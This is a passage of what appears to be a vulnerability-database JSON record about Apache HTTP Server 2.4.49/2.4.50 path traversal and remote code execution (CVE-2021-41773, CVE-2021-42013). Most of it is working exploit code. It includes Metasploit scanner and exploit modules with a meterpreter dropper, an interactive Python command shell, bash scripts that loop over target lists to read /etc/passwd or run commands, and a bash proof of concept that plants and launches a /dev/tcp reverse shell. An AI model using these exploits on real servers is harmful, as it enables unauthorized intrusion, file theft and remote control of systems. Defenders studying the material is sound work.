remote server.'\n }\n ]\n ],\n 'DefaultAction' => 'CHECK_TRAVERSAL'\n )\n )\n\n register_options([\n OptEnum.new('CVE', [true, 'The vulnerability to use', 'CVE-2021-42013', ['CVE-2021-41773', 'CVE-2021-42013']]),\n OptInt.new('DEPTH', [true, 'Depth for Path Traversal', 5]),\n OptString.new('FILEPATH', [false, 'File you want to read', '/etc/passwd']),\n OptString.new('TARGETURI', [true, 'Base path', '/cgi-bin'])\n ])\n end\n\n def exec_traversal(cmd)\n send_request_raw({\n 'method' => Rex::Text.rand_text_alpha(3..4),\n 'uri' => normalize_uri(datastore['TARGETURI'], @traversal.to_s),\n 'data' => \"#{Rex::Text.rand_text_alpha(1..3)}=|echo;#{cmd}\"\n })\n end\n\n def message(msg)\n \"#{@proto}://#{datastore['RHOST']}:#{datastore['RPORT']} - #{msg}\"\n end\n\n def pick_payload\n case datastore['CVE']\n when 'CVE-2021-41773'\n payload = '.%2e/'\n when 'CVE-2021-42013'\n payload = '.%%32%65/'\n else\n payload = ''\n end\n\n payload\n end\n\n def read_traversal\n send_request_raw({\n 'method' => 'GET',\n 'uri' => normalize_uri(@target_uri, @traversal.to_s)\n })\n end\n\n def run_host(ip)\n @proto = (ssl ? 'https' : 'http')\n\n case action.name\n when 'CHECK_TRAVERSAL'\n @target_uri = datastore['TARGETURI']\n @traversal = pick_payload * datastore['DEPTH'] << '/etc/passwd'\n\n response = read_traversal\n unless response\n print_error(message('No response, target seems down.'))\n\n return Exploit::CheckCode::Unknown\n end\n\n if response.code == 200 && response.body.include?('root:x:0:0:')\n print_good(message(\"The target is vulnerable to #{datastore['CVE']}.\"))\n\n vprint_status(\"Obtained HTTP response code #{response.code}.\")\n report_vuln(\n host: target_host,\n name: name,\n refs: references\n )\n\n return Exploit::CheckCode::Vulnerable\n end\n print_error(message(\"The target is not vulnerable to #{datastore['CVE']}.\"))\n\n return Exploit::CheckCode::Safe\n when 'CHECK_RCE'\n @traversal = pick_payload * datastore['DEPTH'] << '/bin/sh'\n rand_str = Rex::Text.rand_text_alpha(4..8)\n\n response = exec_traversal(\"echo #{rand_str}\")\n unless response\n print_error(message('No response, target seems down.'))\n\n return Exploit::CheckCode::Unknown\n end\n\n if response.code == 200 && response.body.include?(rand_str)\n print_good(message(\"The target is vulnerable to #{datastore['CVE']} (mod_cgi is enabled).\"))\n report_vuln(\n host: target_host,\n name: name,\n refs: references\n )\n\n return Exploit::CheckCode::Vulnerable\n end\n print_error(message(\"The target is not vulnerable to #{datastore['CVE']} (requires mod_cgi to be enabled).\"))\n\n return Exploit::CheckCode::Safe\n when 'READ_FILE'\n fail_with(Failure::BadConfig, 'File path option is empty!') if !datastore['FILEPATH'] || datastore['FILEPATH'].empty?\n\n @target_uri = datastore['TARGETURI']\n @traversal = pick_payload * datastore['DEPTH'] << datastore['FILEPATH']\n\n response = read_traversal\n unless response\n print_error(message('No response, target seems down.'))\n\n return Exploit::CheckCode::Unknown\n end\n\n vprint_status(\"Obtained HTTP response code #{response.code}.\")\n if response.code == 500\n print_warning(message(\"The target is vulnerable to #{datastore['CVE']} (mod_cgi is enabled).\"))\n report_vuln(\n host: target_host,\n name: name,\n refs: references\n )\n end\n\n if response.code == 500 || response.body.empty?\n print_error('Nothing was downloaded')\n\n return Exploit::CheckCode::Vulnerable if response.code == 500\n end\n\n if response.code == 200\n vprint_good(\"#{peer} \\n#{response.body}\")\n path = store_loot(\n 'apache.traversal',\n 'application/octet-stream',\n ip,\n response.body,\n datastore['FILEPATH']\n )\n print_good(\"File saved in: #{path}\")\n\n report_vuln(\n host: target_host,\n name: name,\n refs: references\n )\n\n return Exploit::CheckCode::Vulnerable\n end\n\n return Exploit::CheckCode::Safe\n end\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/http/apache_normalize_path.rb", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-17T10:41:58", "description": "This module exploit an unauthenticated RCE vulnerability which exists in Apache version 2.4.49 (CVE-2021-41773). If files outside of the document root are not protected by \u2018require all denied\u2019 and CGI has been explicitly enabled, it can be used to execute arbitrary commands (Remote Command Execution). This vulnerability has been reintroduced in Apache 2.4.50 fix (CVE-2021-42013).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-08T11:22:47", "type": "metasploit", "title": "Apache 2.4.49/2.4.50 Traversal RCE", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-10T13:01:15", "id": "MSF:EXPLOIT-MULTI-HTTP-APACHE_NORMALIZE_PATH_RCE-", "href": "https://www.rapid7.com/db/modules/exploit/multi/http/apache_normalize_path_rce/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n include Msf::Exploit::Remote::CheckModule\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Apache 2.4.49/2.4.50 Traversal RCE',\n 'Description' => %q{\n This module exploit an unauthenticated RCE vulnerability which exists in Apache version 2.4.49 (CVE-2021-41773).\n If files outside of the document root are not protected by \u2018require all denied\u2019 and CGI has been explicitly enabled,\n it can be used to execute arbitrary commands (Remote Command Execution).\n This vulnerability has been reintroduced in Apache 2.4.50 fix (CVE-2021-42013).\n },\n 'References' => [\n ['CVE', '2021-41773'],\n ['CVE', '2021-42013'],\n ['URL', 'https://httpd.apache.org/security/vulnerabilities_24.html'],\n ['URL', 'https://github.com/RootUp/PersonalStuff/blob/master/http-vuln-cve-2021-41773.nse'],\n ['URL', 'https://github.com/projectdiscovery/nuclei-templates/blob/master/vulnerabilities/apache/apache-httpd-rce.yaml'],\n ['URL', 'https://github.com/projectdiscovery/nuclei-templates/commit/9384dd235ec5107f423d930ac80055f2ce2bff74'],\n ['URL', 'https://attackerkb.com/topics/1RltOPCYqE/cve-2021-41773/rapid7-analysis']\n ],\n 'Author' => [\n 'Ash Daulton', # Vulnerability discovery\n 'Dhiraj Mishra', # Metasploit auxiliary module\n 'mekhalleh (RAMELLA S\u00e9bastien)' # Metasploit exploit module (Zeop Entreprise)\n ],\n 'DisclosureDate' => '2021-05-10',\n 'License' => MSF_LICENSE,\n 'Platform' => ['unix', 'linux'],\n 'Arch' => [ARCH_CMD, ARCH_X64, ARCH_X86],\n 'DefaultOptions' => {\n 'CheckModule' => 'auxiliary/scanner/http/apache_normalize_path',\n 'Action' => 'CHECK_RCE',\n 'RPORT' => 443,\n 'SSL' => true\n },\n 'Targets' => [\n [\n 'Automatic (Dropper)',\n {\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X64, ARCH_X86],\n 'Type' => :linux_dropper,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp',\n 'DisablePayloadHandler' => 'false'\n }\n }\n ],\n [\n 'Unix Command (In-Memory)',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :unix_command,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/unix/generic',\n 'DisablePayloadHandler' => 'true'\n }\n }\n ],\n ],\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options([\n OptEnum.new('CVE', [true, 'The vulnerability to use', 'CVE-2021-42013', ['CVE-2021-41773', 'CVE-2021-42013']]),\n OptInt.new('DEPTH', [true, 'Depth for Path Traversal', 5]),\n OptString.new('TARGETURI', [true, 'Base path', '/cgi-bin'])\n ])\n end\n\n def cmd_unix_generic?\n datastore['PAYLOAD'] == 'cmd/unix/generic'\n end\n\n def execute_command(command, _opts = {})\n traversal = pick_payload * datastore['DEPTH'] << '/bin/sh'\n\n uri = normalize_uri(datastore['TARGETURI'], traversal.to_s)\n response = send_request_raw({\n 'method' => Rex::Text.rand_text_alpha(3..4),\n 'uri' => uri,\n 'data' => \"#{Rex::Text.rand_text_alpha(1..3)}=|echo;#{command}\"\n })\n if response && response.body\n return response.body\n end\n\n false\n end\n\n def message(msg)\n \"#{@proto}://#{datastore['RHOST']}:#{datastore['RPORT']} - #{msg}\"\n end\n\n def pick_payload\n case datastore['CVE']\n when 'CVE-2021-41773'\n payload = '.%2e/'\n when 'CVE-2021-42013'\n payload = '.%%32%65/'\n else\n payload = ''\n end\n\n payload\n end\n\n def exploit\n @proto = (ssl ? 'https' : 'http')\n\n if (!check.eql? Exploit::CheckCode::Vulnerable) && !datastore['ForceExploit']\n fail_with(Failure::NotVulnerable, 'The target is not exploitable.')\n end\n\n print_status(message(\"Attempt to exploit for #{datastore['CVE']}\"))\n case target['Type']\n when :linux_dropper\n\n file_name = \"/tmp/#{Rex::Text.rand_text_alpha(4..8)}\"\n cmd = \"echo #{Rex::Text.encode_base64(generate_payload_exe)} | base64 -d > #{file_name}; chmod +x #{file_name}; #{file_name}; rm -f #{file_name}\"\n\n print_status(message(\"Sending #{datastore['PAYLOAD']} command payload\"))\n vprint_status(message(\"Generated command payload: #{cmd}\"))\n\n execute_command(cmd)\n\n register_file_for_cleanup file_name\n when :unix_command\n vprint_status(message(\"Generated payload: #{payload.encoded}\"))\n\n if !cmd_unix_generic?\n execute_command(payload.encoded)\n else\n received = execute_command(payload.encoded.to_s)\n\n print_warning(message('Dumping command output in response'))\n if !received\n print_error(message('Empty response, no command output'))\n\n return\n end\n print_line(received)\n end\n end\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/apache_normalize_path_rce.rb", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2021-10-25T17:32:29", "description": "", "cvss3": {}, "published": "2021-10-25T00:00:00", "type": "packetstorm", "title": "Apache 2.4.49 / 2.4.50 Traversal / Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-25T00:00:00", "id": "PACKETSTORM:164629", "href": "https://packetstormsecurity.com/files/164629/Apache-2.4.49-2.4.50-Traversal-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::EXE \ninclude Msf::Exploit::FileDropper \ninclude Msf::Exploit::Remote::CheckModule \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Apache 2.4.49/2.4.50 Traversal RCE', \n'Description' => %q{ \nThis module exploit an unauthenticated RCE vulnerability which exists in Apache version 2.4.49 (CVE-2021-41773). \nIf files outside of the document root are not protected by \u2018require all denied\u2019 and CGI has been explicitly enabled, \nit can be used to execute arbitrary commands (Remote Command Execution). \nThis vulnerability has been reintroduced in Apache 2.4.50 fix (CVE-2021-42013). \n}, \n'References' => [ \n['CVE', '2021-41773'], \n['CVE', '2021-42013'], \n['URL', 'https://httpd.apache.org/security/vulnerabilities_24.html'], \n['URL', 'https://github.com/RootUp/PersonalStuff/blob/master/http-vuln-cve-2021-41773.nse'], \n['URL', 'https://github.com/projectdiscovery/nuclei-templates/blob/master/vulnerabilities/apache/apache-httpd-rce.yaml'], \n['URL', 'https://github.com/projectdiscovery/nuclei-templates/commit/9384dd235ec5107f423d930ac80055f2ce2bff74'], \n['URL', 'https://attackerkb.com/topics/1RltOPCYqE/cve-2021-41773/rapid7-analysis'] \n], \n'Author' => [ \n'Ash Daulton', # Vulnerability discovery \n'Dhiraj Mishra', # Metasploit auxiliary module \n'mekhalleh (RAMELLA S\u00e9bastien)' # Metasploit exploit module (Zeop Entreprise) \n], \n'DisclosureDate' => '2021-05-10', \n'License' => MSF_LICENSE, \n'Platform' => ['unix', 'linux'], \n'Arch' => [ARCH_CMD, ARCH_X64, ARCH_X86], \n'DefaultOptions' => { \n'CheckModule' => 'auxiliary/scanner/http/apache_normalize_path', \n'Action' => 'CHECK_RCE', \n'RPORT' => 443, \n'SSL' => true \n}, \n'Targets' => [ \n[ \n'Automatic (Dropper)', \n{ \n'Platform' => 'linux', \n'Arch' => [ARCH_X64, ARCH_X86], \n'Type' => :linux_dropper, \n'DefaultOptions' => { \n'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp', \n'DisablePayloadHandler' => 'false' \n} \n} \n], \n[ \n'Unix Command (In-Memory)', \n{ \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'Type' => :unix_command, \n'DefaultOptions' => { \n'PAYLOAD' => 'cmd/unix/generic', \n'DisablePayloadHandler' => 'true' \n} \n} \n], \n], \n'DefaultTarget' => 0, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] \n} \n) \n) \n \nregister_options([ \nOptEnum.new('CVE', [true, 'The vulnerability to use', 'CVE-2021-42013', ['CVE-2021-41773', 'CVE-2021-42013']]), \nOptInt.new('DEPTH', [true, 'Depth for Path Traversal', 5]), \nOptString.new('TARGETURI', [true, 'Base path', '/cgi-bin']) \n]) \nend \n \ndef cmd_unix_generic? \ndatastore['PAYLOAD'] == 'cmd/unix/generic' \nend \n \ndef execute_command(command, _opts = {}) \ntraversal = pick_payload * datastore['DEPTH'] << '/bin/sh' \n \nuri = normalize_uri(datastore['TARGETURI'], traversal.to_s) \nresponse = send_request_raw({ \n'method' => Rex::Text.rand_text_alpha(3..4), \n'uri' => uri, \n'data' => \"#{Rex::Text.rand_text_alpha(1..3)}=|echo;#{command}\" \n}) \nif response && response.body \nreturn response.body \nend \n \nfalse \nend \n \ndef message(msg) \n\"#{@proto}://#{datastore['RHOST']}:#{datastore['RPORT']} - #{msg}\" \nend \n \ndef pick_payload \ncase datastore['CVE'] \nwhen 'CVE-2021-41773' \npayload = '.%2e/' \nwhen 'CVE-2021-42013' \npayload = '.%%32%65/' \nelse \npayload = '' \nend \n \npayload \nend \n \ndef exploit \n@proto = (ssl ? 'https' : 'http') \n \nif (!check.eql? Exploit::CheckCode::Vulnerable) && !datastore['ForceExploit'] \nfail_with(Failure::NotVulnerable, 'The target is not exploitable.') \nend \n \nprint_status(message(\"Attempt to exploit for #{datastore['CVE']}\")) \ncase target['Type'] \nwhen :linux_dropper \n \nfile_name = \"/tmp/#{Rex::Text.rand_text_alpha(4..8)}\" \ncmd = \"echo #{Rex::Text.encode_base64(generate_payload_exe)} | base64 -d > #{file_name}; chmod +x #{file_name}; #{file_name}; rm -f #{file_name}\" \n \nprint_status(message(\"Sending #{datastore['PAYLOAD']} command payload\")) \nvprint_status(message(\"Generated command payload: #{cmd}\")) \n \nexecute_command(cmd) \n \nregister_file_for_cleanup file_name \nwhen :unix_command \nvprint_status(message(\"Generated payload: #{payload.encoded}\")) \n \nif !cmd_unix_generic? \nexecute_command(payload.encoded) \nelse \nreceived = execute_command(payload.encoded.to_s) \n \nprint_warning(message('Dumping command output in response')) \nif !received \nprint_error(message('Empty response, no command output')) \n \nreturn \nend \nprint_line(received) \nend \nend \nend \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/164629/apache_normalize_path_rce.rb.txt", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-11T17:16:30", "description": "", "cvss3": {}, "published": "2021-11-11T00:00:00", "type": "packetstorm", "title": "Apache HTTP Server 2.4.50 Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-11-11T00:00:00", "id": "PACKETSTORM:164941", "href": "https://packetstormsecurity.com/files/164941/Apache-HTTP-Server-2.4.50-Remote-Code-Execution.html", "sourceData": "`# Exploit Title: Apache HTTP Server 2.4.50 - Remote Code Execution (RCE) (3) \n# Date: 11/11/2021 \n# Exploit Author: Valentin Lobstein \n# Vendor Homepage: https://apache.org/ \n# Software Link: https://github.com/Balgogan/CVE-2021-41773 \n# Version: Apache 2.4.49/2.4.50 (CGI enabled) \n# Tested on: Debian GNU/Linux \n# CVE : CVE-2021-41773 / CVE-2021-42013 \n# Credits : Lucas Schnell \n \n \n#!/usr/bin/env python3 \n#coding: utf-8 \n \nimport os \nimport re \nimport sys \nimport time \nimport requests \nfrom colorama import Fore,Style \n \n \nheader = '''\\033[1;91m \n \n\u2584\u2584\u2584 \u2588\u2588\u2593\u2588\u2588\u2588 \u2584\u2584\u2584 \u2584\u2588\u2588\u2588\u2588\u2584 \u2588\u2588\u2591 \u2588\u2588 \u2593\u2588\u2588\u2588\u2588\u2588 \u2588\u2588\u2580\u2588\u2588\u2588 \u2584\u2588\u2588\u2588\u2588\u2584 \u2593\u2588\u2588\u2588\u2588\u2588 \n\u2592\u2588\u2588\u2588\u2588\u2584 \u2593\u2588\u2588\u2591 \u2588\u2588\u2592\u2592\u2588\u2588\u2588\u2588\u2584 \u2592\u2588\u2588\u2580 \u2580\u2588 \u2593\u2588\u2588\u2591 \u2588\u2588\u2592\u2593\u2588 \u2580 \u2593\u2588\u2588 \u2592 \u2588\u2588\u2592\u2592\u2588\u2588\u2580 \u2580\u2588 \u2593\u2588 \u2580 \n\u2592\u2588\u2588 \u2580\u2588\u2584 \u2593\u2588\u2588\u2591 \u2588\u2588\u2593\u2592\u2592\u2588\u2588 \u2580\u2588\u2584 \u2592\u2593\u2588 \u2584 \u2592\u2588\u2588\u2580\u2580\u2588\u2588\u2591\u2592\u2588\u2588\u2588 \u2593\u2588\u2588 \u2591\u2584\u2588 \u2592\u2592\u2593\u2588 \u2584 \u2592\u2588\u2588\u2588 \n\u2591\u2588\u2588\u2584\u2584\u2584\u2584\u2588\u2588 \u2592\u2588\u2588\u2584\u2588\u2593\u2592 \u2592\u2591\u2588\u2588\u2584\u2584\u2584\u2584\u2588\u2588 \u2592\u2593\u2593\u2584 \u2584\u2588\u2588\u2592\u2591\u2593\u2588 \u2591\u2588\u2588 \u2592\u2593\u2588 \u2584 \u2592\u2588\u2588\u2580\u2580\u2588\u2584 \u2592\u2593\u2593\u2584 \u2584\u2588\u2588\u2592\u2592\u2593\u2588 \u2584 \n\u2593\u2588 \u2593\u2588\u2588\u2592\u2592\u2588\u2588\u2592 \u2591 \u2591 \u2593\u2588 \u2593\u2588\u2588\u2592\u2592 \u2593\u2588\u2588\u2588\u2580 \u2591\u2591\u2593\u2588\u2592\u2591\u2588\u2588\u2593\u2591\u2592\u2588\u2588\u2588\u2588\u2592 \u2591\u2588\u2588\u2593 \u2592\u2588\u2588\u2592\u2592 \u2593\u2588\u2588\u2588\u2580 \u2591\u2591\u2592\u2588\u2588\u2588\u2588\u2592 \n\u2592\u2592 \u2593\u2592\u2588\u2591\u2592\u2593\u2592\u2591 \u2591 \u2591 \u2592\u2592 \u2593\u2592\u2588\u2591\u2591 \u2591\u2592 \u2592 \u2591 \u2592 \u2591\u2591\u2592\u2591\u2592\u2591\u2591 \u2592\u2591 \u2591 \u2591 \u2592\u2593 \u2591\u2592\u2593\u2591\u2591 \u2591\u2592 \u2592 \u2591\u2591\u2591 \u2592\u2591 \u2591 \n\u2592 \u2592\u2592 \u2591\u2591\u2592 \u2591 \u2592 \u2592\u2592 \u2591 \u2591 \u2592 \u2592 \u2591\u2592\u2591 \u2591 \u2591 \u2591 \u2591 \u2591\u2592 \u2591 \u2592\u2591 \u2591 \u2592 \u2591 \u2591 \u2591 \n\u2591 \u2592 \u2591\u2591 \u2591 \u2592 \u2591 \u2591 \u2591\u2591 \u2591 \u2591 \u2591\u2591 \u2591 \u2591 \u2591 \n''' + Style.RESET_ALL \n \n \nif len(sys.argv) < 2 : \nprint( 'Use: python3 file.py ip:port ' ) \nsys.exit() \n \ndef end(): \nprint(\"\\t\\033[1;91m[!] Bye bye !\") \ntime.sleep(0.5) \nsys.exit(1) \n \ndef commands(url,command,session): \ndirectory = mute_command(url,'pwd') \nuser = mute_command(url,'whoami') \nhostname = mute_command(url,'hostname') \nadvise = print(Fore.YELLOW + 'Reverse shell is advised (This isn\\'t an interactive shell)') \ncommand = input(f\"{Fore.RED}\u256d\u2500{Fore.GREEN + user}@{hostname}: {Fore.BLUE + directory}\\n{Fore.RED}\u2570\u2500{Fore.YELLOW}$ {Style.RESET_ALL}\") \ncommand = f\"echo; {command};\" \nreq = requests.Request('POST', url=url, data=command) \nprepare = req.prepare() \nprepare.url = url \nresponse = session.send(prepare, timeout=5) \noutput = response.text \nprint(output) \nif 'clear' in command: \nos.system('/usr/bin/clear') \nprint(header) \nif 'exit' in command: \nend() \n \ndef mute_command(url,command): \nsession = requests.Session() \nreq = requests.Request('POST', url=url, data=f\"echo; {command}\") \nprepare = req.prepare() \nprepare.url = url \nresponse = session.send(prepare, timeout=5) \nreturn response.text.strip() \n \n \ndef exploitRCE(payload): \ns = requests.Session() \ntry: \nhost = sys.argv[1] \nif 'http' not in host: \nurl = 'http://'+ host + payload \nelse: \nurl = host + payload \nsession = requests.Session() \ncommand = \"echo; id\" \nreq = requests.Request('POST', url=url, data=command) \nprepare = req.prepare() \nprepare.url = url \nresponse = session.send(prepare, timeout=5) \noutput = response.text \nif \"uid\" in output: \nchoice = \"Y\" \nprint( Fore.GREEN + '\\n[!] Target %s is vulnerable !!!' % host) \nprint(\"[!] Sortie:\\n\\n\" + Fore.YELLOW + output ) \nchoice = input(Fore.CYAN + \"[?] Do you want to exploit this RCE ? (Y/n) : \") \nif choice.lower() in ['','y','yes']: \nwhile True: \ncommands(url,command,session) \nelse: \nend() \nelse : \nprint(Fore.RED + '\\nTarget %s isn\\'t vulnerable' % host) \nexcept KeyboardInterrupt: \nend() \n \ndef main(): \ntry: \napache2449_payload = '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/bash' \napache2450_payload = '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/bash' \npayloads = [apache2449_payload,apache2450_payload] \nchoice = len(payloads) + 1 \nprint(header) \nprint(\"\\033[1;37m[0] Apache 2.4.49 RCE\\n[1] Apache 2.4.50 RCE\") \nwhile choice >= len(payloads) and choice >= 0: \nchoice = int(input('[~] Choice : ')) \nif choice < len(payloads): \nexploitRCE(payloads[choice]) \nexcept KeyboardInterrupt: \nprint(\"\\n\\033[1;91m[!] Bye bye !\") \ntime.sleep(0.5) \nsys.exit(1) \n \nif __name__ == '__main__': \nmain() \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/164941/apachehttp2450-exec.txt", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-13T15:48:46", "description": "", "cvss3": {}, "published": "2021-10-13T00:00:00", "type": "packetstorm", "title": "Apache HTTP Server 2.4.50 Path Traversal / Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-42013"], "modified": "2021-10-13T00:00:00", "id": "PACKETSTORM:164501", "href": "https://packetstormsecurity.com/files/164501/Apache-HTTP-Server-2.4.50-Path-Traversal-Code-Execution.html", "sourceData": "`# Exploit: Apache HTTP Server 2.4.50 - Path Traversal & Remote Code Execution (RCE) \n# Date: 10/05/2021 \n# Exploit Author: Lucas Souza https://lsass.io \n# Vendor Homepage: https://apache.org/ \n# Version: 2.4.50 \n# Tested on: 2.4.50 \n# CVE : CVE-2021-42013 \n# Credits: Ash Daulton and the cPanel Security Team \n \n#!/bin/bash \n \nif [[ $1 == '' ]]; [[ $2 == '' ]]; then \necho Set [TAGET-LIST.TXT] [PATH] [COMMAND] \necho ./PoC.sh targets.txt /etc/passwd \necho ./PoC.sh targets.txt /bin/sh id \n \nexit \nfi \nfor host in $(cat $1); do \necho $host \ncurl -s --path-as-is -d \"echo Content-Type: text/plain; echo; $3\" \"$host/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/$2\"; done \n \n# PoC.sh targets.txt /etc/passwd \n# PoC.sh targets.txt /bin/sh whoami \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/164501/apache2450-traversalexec.txt", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-10-25T17:32:30", "description": "", "cvss3": {}, "published": "2021-10-24T00:00:00", "type": "packetstorm", "title": "Apache HTTP Server 2.4.50 Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-42013"], "modified": "2021-10-24T00:00:00", "id": "PACKETSTORM:164609", "href": "https://packetstormsecurity.com/files/164609/Apache-HTTP-Server-2.4.50-Remote-Code-Execution.html", "sourceData": "`# Exploit: Apache HTTP Server 2.4.50 - Remote Code Execution (RCE) (2) \n# Credits: Ash Daulton & cPanel Security Team \n# Date: 24/07/2021 \n# Exploit Author: TheLastVvV.com \n# Vendor Homepage: https://apache.org/ \n# Version: Apache 2.4.50 with CGI enable \n# Tested on : Debian 5.10.28 \n# CVE : CVE-2021-42013 \n \n#!/bin/bash \n \necho 'PoC CVE-2021-42013 reverse shell Apache 2.4.50 with CGI' \nif [ $# -eq 0 ] \nthen \necho \"try: ./$0 http://ip:port LHOST LPORT\" \nexit 1 \nfi \ncurl \"$1/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh\" -d \"echo Content-Type: text/plain; echo; echo '/bin/sh -i >& /dev/tcp/$2/$3 0>&1' > /tmp/revoshell.sh\" && curl \"$1/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh\" -d \"echo Content-Type: text/plain; echo; bash /tmp/revoshell.sh\" \n \n#usage chmod -x CVE-2021-42013.sh \n#./CVE-2021-42013_reverseshell.sh http://ip:port/ LHOST LPORT \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/164609/apache2450-exec.txt", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-06T17:18:36", "description": "", "cvss3": {}, "published": "2021-10-06T00:00:00", "type": "packetstorm", "title": "Apache HTTP Server 2.4.49 Path Traversal", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-41773"], "modified": "2021-10-06T00:00:00", "id": "PACKETSTORM:164418", "href": "https://packetstormsecurity.com/files/164418/Apache-HTTP-Server-2.4.49-Path-Traversal.html", "sourceData": "`# Exploit Title: Apache HTTP Server 2.4.49 - Path Traversal \n# Date: 10/05/2021 \n# Exploit Author: Lucas Souza https://lsass.io \n# Vendor Homepage: https://apache.org/ \n# Version: 2.4.49 \n# Tested on: 2.4.49 \n# CVE : CVE-2021-41773 \n# Credits: Ash Daulton and the cPanel Security Team \n \n#!/bin/bash \n \nif [[ $1 =3D=3D '' ]]; [[ $2 =3D=3D '' ]]; then \necho Set [TAGET-LIST.TXT] [PATH] \necho ./PoC.sh targets.txt /etc/passwd \nexit \nfi \nfor host in $(cat $1); do \ncurl --silent --path-as-is --insecure \"$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e$2\"; done \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/164418/apache2449-traversal.txt", "cvss": {"score": 0.0, "vector": "NONE"}}], "zdt": [{"lastseen": "2021-12-23T13:19:11", "description": "This Metasploit module exploits an unauthenticated remote code execution vulnerability which exists in Apache version 2.4.49 (CVE-2021-41773). If files outside of the document root are not protected by \u2018require all denied\u2019 and CGI has been explicitly enabled, it can be used to execute arbitrary commands. This vulnerability has been reintroduced in the Apache 2.4.50 fix (CVE-2021-42013).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-26T00:00:00", "type": "zdt", "title": "Apache 2.4.49 / 2.4.50 Traversal / Remote Code Execution 